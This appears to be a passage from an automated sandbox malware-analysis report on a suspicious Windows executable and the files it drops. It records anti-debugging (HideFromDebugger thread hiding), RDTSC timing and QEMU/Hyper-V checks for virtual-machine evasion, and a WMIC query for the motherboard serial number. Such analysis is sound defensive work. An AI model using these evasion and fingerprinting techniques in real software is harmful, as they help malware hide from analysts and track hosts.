Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeRDTSC instruction interceptor: First address: 40A962 second address: 40A962 instructions: 0x00000000 rdtsc 0x00000002 imul eax, eax, 000343FDh 0x00000008 add eax, 00269EC3h 0x0000000d shr eax, 10h 0x00000010 and eax, 00007FFFh 0x00000015 mov ecx, dword ptr [ebp+10h] 0x00000018 test ecx, ecx 0x0000001a jne 00007F8AB86C7227h 0x0000001c sub ecx, dword ptr [ebp+08h] 0x0000001f inc ecx 0x00000020 xor edx, edx 0x00000022 div ecx 0x00000024 add edx, dword ptr [ebp+08h] 0x00000027 mov eax, edx 0x00000029 pop edx 0x0000002a pop ecx 0x0000002b mov esp, ebp 0x0000002d pop ebp 0x0000002e retn 0010h 0x00000031 xor ecx, ecx 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 push eax 0x00000036 cmp ecx, eax 0x00000038 jg 00007F8AB86C73ABh 0x0000003e push 00000001h 0x00000040 push 00000003h 0x00000045 push 00000001h 0x00000047 push 00000001h 0x0000004c call 00007F8AB86C73D1h 0x00000051 push ebp 0x00000052 mov ebp, esp 0x00000054 push ecx 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Code function: 7_3_6CAFE267 rdtsc 7_3_6CAFE267
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Window / User API: threadDelayed 2447
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Window / User API: threadDelayed 2242
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Window / User API: threadDelayed 1376
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Window / User API: threadDelayed 992
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Window / User API: threadDelayed 552
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Dropped PE file which has not been started: C:\Users\user\Desktop\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\zlibwapi.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Dropped PE file which has not been started: C:\Users\user\Desktop\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Dropped PE file which has not been started: C:\Users\user\Desktop\concrt140.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Dropped PE file which has not been started: C:\Users\user\Desktop\msvcp140_codecvt_ids.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\XLBugHandler.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Dropped PE file which has not been started: C:\Users\user\Desktop\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\minizip.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Dropped PE file which has not been started: C:\Users\user\Desktop\msvcp140_atomic_wait.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Dropped PE file which has not been started: C:\Users\user\Desktop\msvcp140.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Dropped PE file which has not been started: C:\Users\user\Desktop\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ExuiKrnln_Win64.lib
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Dropped PE file which has not been started: C:\Users\user\Desktop\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AntiCheat.dll
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe TID: 7804 Thread sleep time: -55500s >= -30000s
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe File opened: PhysicalDrive0
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Thread sleep count: Count: 1376 delay: -3
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00417AD2 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,swprintf,swprintf,FindFirstFileW,_wcsicmp,_wcsicmp,_wcsicmp,swprintf,RemoveDirectoryW,_wcsicmp,swprintf,swprintf,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,14_2_00417AD2
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00434B30 GetModuleHandleW,GetModuleFileNameW,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,wcscat,FindFirstFileW,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??0?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@H@Z,GetCommandLineW,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV01@K@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,FindNextFileW,FindClose,?str@?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBE?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@2@XZ,??_D?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEXXZ,14_2_00434B30
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00432D00 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ,?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,FindFirstFileW,_wcsicmp,_wcsicmp,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,CopyFileW,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,FindNextFileW,FindClose,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,14_2_00432D00
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00417E47 FindFirstFileW,14_2_00417E47
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_0043DCBA FindFirstFileW,FindClose,14_2_0043DCBA
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00418630 GetFileAttributesExW,FindFirstFileW,FindClose,CreateFileW,GetFileSizeEx,CloseHandle,14_2_00418630
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_004184A0 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@_W@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,FindFirstFileW,FindNextFileW,FindClose,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,14_2_004184A0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_1005CBA0 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindFirstFileA,GetLastError,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??3@YAXPAX@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,14_2_1005CBA0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_10027330 FindFirstFileA,FindClose,14_2_10027330
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_10071280 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindFirstFileA,FindFirstFileA,FindClose,?npos@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@2IB,?find_last_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,FindFirstFileA,FindNextFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,RemoveDirectoryA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,14_2_10071280
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_00417AD2 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,swprintf,swprintf,FindFirstFileW,_wcsicmp,_wcsicmp,_wcsicmp,swprintf,RemoveDirectoryW,_wcsicmp,swprintf,swprintf,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,15_2_00417AD2
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_00434B30 GetModuleHandleW,GetModuleFileNameW,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,wcscat,FindFirstFileW,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??0?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@H@Z,GetCommandLineW,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV01@K@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,FindNextFileW,FindClose,?str@?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBE?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@2@XZ,??_D?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEXXZ,15_2_00434B30
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_00432D00 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ,?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,FindFirstFileW,_wcsicmp,_wcsicmp,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,CopyFileW,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,FindNextFileW,FindClose,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,15_2_00432D00
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_00417E47 FindFirstFileW,15_2_00417E47
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_0043DCBA FindFirstFileW,FindClose,15_2_0043DCBA
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_00418630 GetFileAttributesExW,FindFirstFileW,FindClose,CreateFileW,GetFileSizeEx,CloseHandle,15_2_00418630
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_004184A0 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@_W@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,FindFirstFileW,FindNextFileW,FindClose,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,15_2_004184A0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_1005CBA0 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindFirstFileA,GetLastError,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??3@YAXPAX@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,15_2_1005CBA0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_100272A0 FindFirstFileA,FindClose,15_2_100272A0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_10027330 FindFirstFileA,FindClose,15_2_10027330
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_10071280 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindFirstFileA,FindFirstFileA,FindClose,?npos@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@2IB,?find_last_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,FindFirstFileA,FindNextFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,RemoveDirectoryA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,15_2_10071280
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_100357B0 RtlInitializeCriticalSection,GetSystemInfo,14_2_100357B0
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000001AA3000.00000002.10000000.00040000.00000000.sdmpBinary or memory string: \QEMU
Source: MiniThunderPlatform.exe, 0000000E.00000002.1614649879.00000000007F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
Source: MiniThunderPlatform.exe, 0000000F.00000002.1723825853.0000000000808000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXr2
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C656130 NtSetInformationThread 000000FE,00000011,00000000,000000007_3_6C656130
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Thread information set: HideFromDebugger (6 occurrences)
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6CAFE267 rdtsc 7_3_6CAFE267
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C722D2E LdrInitializeThunk,7_3_6C722D2E
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00437770 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,14_2_00437770
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_004404DF GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,14_2_004404DF
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic BaseBoard get SerialNumber
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1416143729.00000000083CE000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmpBinary or memory string: ,Tab_HbitmapLayeredTab_UpdateStateTab_RefreshCallBackTab_NeedUpdateFocusManagementTabDownTab_OLDFocuscontrolTab_WM_DESTROYTab_WM_DESTROY_TRUETab_WM_32879EXUI_USERDATATab_WM_DESTROY_FALSETab_IsWinControlWM_SIZEIsunicodeTab_GraphicsTab_OldHbitmapICON_1DownlistExShell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,14_2_00426180
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: GetLocaleInfoA,14_2_0041759B
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,14_2_100010CA
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,15_2_00426180
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: GetLocaleInfoA,15_2_0041759B
